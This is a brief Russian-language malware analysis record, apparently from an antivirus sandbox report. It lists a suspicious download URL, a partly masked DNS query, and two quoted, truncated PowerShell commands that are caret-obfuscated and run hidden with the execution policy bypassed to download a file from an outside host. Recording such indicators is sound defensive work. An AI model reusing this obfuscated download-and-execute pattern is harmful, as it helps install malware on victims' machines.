Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWe^R^SHeLL^.E^xE -^exec^UtIO^NpO^LicY^ B^ypaS^S -NO^P^rof^iLE -w^i^NDOw^st^yL^e^ hid^d^e^N^ (^n^ew^-ObJec^t^ S^y^StEm^.^n^E^T^.WeB^CLi^E^N^T)^.DoW^nL^o^adfi^lE('http://ww...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "POWe^R^SHeLL^.E^xE -^exec^UtIO^NpO^LicY^ B^ypaS^S -NO^P^rof^iLE -w^i^NDOw^st^yL^e^ hid^d^e^N^ (^n^ew^-ObJec^t^ S^y^StEm^.^n^E^T^.WeB^CLi^E^N^T)^.DoW^nL^o^adfi^lE('http://ww...' (со скрытым окном)